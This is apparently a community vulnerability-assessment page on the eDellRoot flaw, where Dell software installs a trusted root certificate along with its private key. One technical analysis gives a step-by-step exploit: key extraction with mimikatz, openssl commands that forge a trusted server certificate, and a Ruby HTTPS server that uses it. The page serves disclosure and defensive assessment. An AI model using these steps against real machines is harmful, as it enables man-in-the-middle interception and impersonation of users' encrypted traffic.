Attacker Value
Very High
(2 users assessed)
Exploitability
Moderate
(2 users assessed)
User Interaction
Unknown
Privileges Required
Unknown
Attack Vector
Unknown
1

Dell Foundation Services installs root certificate and private key (eDellRoot)

Last updated February 13, 2020
Add MITRE ATT&CK tactics and techniques that apply to this CVE.

Description

Dell Foundation Services installs the eDellRoot certificate into theTrusted Root Certificate Store on Microsoft Windows systems. The certificate includes the private key. This allows attackers to create trusted certificates and perform impersonation, man-in-the-middle (MiTM), and passive decryption attacks, resulting in the exposure of sensitive information.

Add Assessment

1
Technical Analysis

Details

How to exploit:

  • Export the DER CA certificate (through the windows certificate manager for example).
  • Covert DER CA certificate to PEM
openssl x509 -in der_edell_root.cer -inform der -outform pem -out edell_root.pem
  • Export the certificate private key, use mimikatz
crypto::certificates /systemstore:local_machine /store:Root /export

The certificate (again) and its private key will be in the directory where mimikatz lives. The private key is inside the .pfx

  • Extract the key from the pfx and save as pem (password: mimikatz)
openssl pkcs12 -in local_machine_Root_3_eDellRoot.pfx -nocerts -out key.pem -nodes
  • Save the file.srl with “6C”

  • Create a server certificate request

openssl genrsa -out server.key 1024
openssl req -key server.key -new -out server.req

Use the CA certificate and its private key to generate the server certificate:

openssl x509 -req -in server.req -CA edell_root.pem -CAkey key.pem -CAserial file.srl -out server.pem

profit!

require 'webrick'
require 'webrick/https'
require 'openssl'

cert = OpenSSL::X509::Certificate.new(File.read('server.pem'))
pkey = OpenSSL::PKey::RSA.new(File.read('server.key'))

server = WEBrick::HTTPServer.new(:Port => 8000, :SSLEnable => true, :SSLCertificate => cert, :SSLPrivateKey => pkey)
server.start

Go to localhost:8000/test.html, you should see that eDellRoot has identified the site as localhos,
and that your connection is trusted.

1
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Medium
Technical Analysis

It’s terrifying that this certificate supports all issuance and application policies. Reddit users have proven that this can be used to MitM HTTPS-encrypted web browsing, as well as to sign code. It’s unclear as to whether the certificate is unique to each install (which would turn this into maybe a local privesc, or whether the certificate is shared across all installs, at which point this becomes a threat to any Dell user on a compromised network.

It’s also worth pointing out that some users didn’t have the certificate described, but then had it added later after running updates. So sysadmins might have checked for this, but then had their workstations put into a vulnerable state afterwards.

General Information

Additional Info

Technical Analysis